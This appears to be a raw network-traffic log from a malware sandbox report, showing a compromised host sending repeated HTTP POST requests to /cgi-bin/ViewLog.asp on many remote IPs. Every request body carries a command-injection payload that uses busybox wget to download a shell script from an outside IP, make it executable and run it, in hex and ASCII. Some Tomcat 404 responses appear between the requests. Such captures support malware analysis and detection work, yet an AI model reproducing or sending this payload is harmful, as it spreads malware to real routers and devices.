                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        892192.168.2.144456894.121.58.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.214855909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        893192.168.2.145361294.44.22.1998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.238276005 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        894192.168.2.143649294.120.228.158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.399188995 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        895192.168.2.143759894.123.150.1128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.460633039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        896192.168.2.143689694.123.101.2158080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.460851908 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        897192.168.2.145086695.153.237.1328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:59.473051071 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:59.758774996 CET83INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        Transfer-Encoding: chunked


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        898192.168.2.145033062.77.130.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.189532042 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.411742926 CET1011INHTTP/1.1 404
                                                        Access-Control-Allow-Origin: *
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 783
                                                        Date: Wed, 14 Feb 2024 08:34:59 GMT
                                                        Keep-Alive: timeout=20
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 35 38 20 28 55 62 75 6e 74 75 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.58 (Ubuntu)</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        899192.168.2.144928885.214.246.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.192120075 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:00.412417889 CET1175INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 1012
                                                        Date: Wed, 14 Feb 2024 08:35:00 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.24 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.24</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        900192.168.2.145331431.136.248.1338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.631000996 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:01.316273928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:02.660244942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:05.316343069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.691889048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:21.443458080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:42.690613031 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        901192.168.2.146009294.147.56.898080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.865895033 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        902192.168.2.144776431.200.34.538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.885065079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        903192.168.2.145609894.122.115.778080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.885123014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        904192.168.2.145040894.121.56.18080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:00.885154963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        905192.168.2.145856094.121.111.2388080
                                                        TimestampBytes transferredDirectionData
